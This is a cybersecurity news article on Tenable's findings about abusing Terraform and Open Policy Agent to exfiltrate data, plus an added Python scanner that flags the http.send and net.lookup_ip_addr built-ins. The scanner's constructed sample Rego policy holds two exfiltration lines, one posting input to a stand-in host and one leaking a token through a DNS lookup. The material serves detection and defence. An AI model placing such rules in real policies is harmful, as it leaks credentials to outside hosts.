Cybersecurity

New Cybersecurity Threats Target IaC and PaC Tools in Cloud Platforms

By Business Verticals | Published: November 29, 15:16 | Updated: November 29, 15:19
Cybersecurity vulnerabilities in Infrastructure-as-Code and Policy-as-Code tools expose cloud platforms to potential data breaches.

Cybersecurity experts have unveiled two novel attack techniques targeting Infrastructure-as-Code (IaC) and Policy-as-Code (PaC) tools, such as HashiCorp's Terraform and Styra's Open Policy Agent (OPA). Both techniques abuse the dedicated domain-specific languages (DSLs) these tools use to breach cloud platforms and steal data.

According to Tenable senior security researcher Shelly Raban, "While these structured languages are designed to be more secure than traditional programming languages, they are not impervious." The technical report, released last week, emphasizes the need for vigilance despite the enhanced security measures these languages provide.

OPA, an open-source policy engine, allows organizations to enforce compliance across cloud-native environments, including microservices, CI/CD pipelines, and Kubernetes. Policies are created using a native query language known as Rego, which OPA evaluates to generate decisions.

Tenable's research indicates that the new attack method focuses on the supply chain. An attacker gains unauthorized access via a compromised access key, enabling them to insert a malicious Rego policy into an OPA server. This malicious policy can be used during the policy decision phase to perform harmful actions, like credential exfiltration, using the built-in "http.send" function.

Notably, even if OPA deployments restrict the use of the "http.send" function, attackers can still exploit the "net.lookup_ip_addr" function to conduct data exfiltration using DNS lookups in a technique known as DNS tunneling. Raban advises organizations to monitor and potentially restrict the use of this additional function to mitigate exfiltration risks.
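One way to act on that advice is a CI gate that flags the two network-capable built-ins before a policy bundle is pushed to an OPA server. The scanner below is an added example, not Tenable's or OPA's own code; the deny-list, the sample policy and the `find_denied_builtins` function are constructed for this illustration.

```python
"""Pre-load gate for Rego policies: flag network-capable built-ins.

Added example (not from Tenable or the OPA project). The deny-list covers
the two built-ins discussed above; the sample policy is constructed.
"""
import re

# Built-ins that give a policy an egress channel (HTTP and DNS).
DENYLIST = ("http.send", "net.lookup_ip_addr")


def _strip_comments_and_strings(line: str) -> str:
    """Blank out "..."/`...` literals and '#' comments so a built-in name
    that only appears in a message string or comment is not reported."""
    out, i, quote = [], 0, None
    while i < len(line):
        ch = line[i]
        if quote:                         # inside a string literal
            if ch == "\\" and quote == '"':
                i += 1                    # skip the escaped character
            elif ch == quote:
                quote = None
        elif ch in ('"', "`"):
            quote = ch
        elif ch == "#":                   # rest of line is a comment
            break
        else:
            out.append(ch)
        i += 1
    return "".join(out)


def find_denied_builtins(rego_source: str, denylist=DENYLIST):
    """Return (line_number, builtin) for each call to a denied built-in."""
    names = "|".join(map(re.escape, denylist))
    pattern = re.compile(r"(?<![\w.])(" + names + r")\s*\(")
    hits = []
    for n, raw in enumerate(rego_source.splitlines(), start=1):
        for m in pattern.finditer(_strip_comments_and_strings(raw)):
            hits.append((n, m.group(1)))
    return hits


SAMPLE_POLICY = '''package authz   # constructed sample policy
default allow := false
allow { input.user == "admin" }
# http.send("x") in this comment must not be reported
msg := "see net.lookup_ip_addr docs"
leak { http.send({"method": "post", "url": "https://example.invalid", "body": input}) }
dns_leak { net.lookup_ip_addr(concat(".", [input.token, "example.invalid"])) }
'''

if __name__ == "__main__":
    for line, name in find_denied_builtins(SAMPLE_POLICY):
        print(f"line {line}: denied built-in {name}")
```

A lexical scan is a pre-commit check, not an enforcement boundary; pair it with OPA's own capabilities mechanism, which lets you remove built-ins from what the compiler accepts, and with the logging of policy decisions recommended below.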

Similarly, Terraform, which simplifies cloud resource management through code-based definitions, can also be exploited. Attackers could leverage the "terraform plan" command during GitHub "pull_request" workflows to execute unreviewed changes that include malicious data sources as part of the CI/CD process.

Tenable warns that because data sources are evaluated during the "terraform plan" phase, not only at apply time, the barrier for attackers is significantly lowered. A malicious insider or an external attacker with access to a public or private repository could manipulate a pull request for their own gains.

The potential attack vectors include rogue external data sources, malicious Terraform modules shared through public or private registries, or even DNS data sources. To safeguard against these threats, organizations should ensure they only use third-party components from trusted sources and implement additional security measures, including:

  • Enforcing granular role-based access control (RBAC) and adhering to the principle of least privilege.

  • Establishing application-level and cloud-level logging for thorough monitoring.

  • Limiting network and data access for applications and their underlying infrastructure.

  • Preventing the automatic execution of unreviewed and potentially harmful code within CI/CD pipelines.

Organizations can further bolster their defenses by employing IaC scanning tools, such as Terrascan and Checkov, to proactively identify misconfigurations and compliance issues before deploying changes to their environments.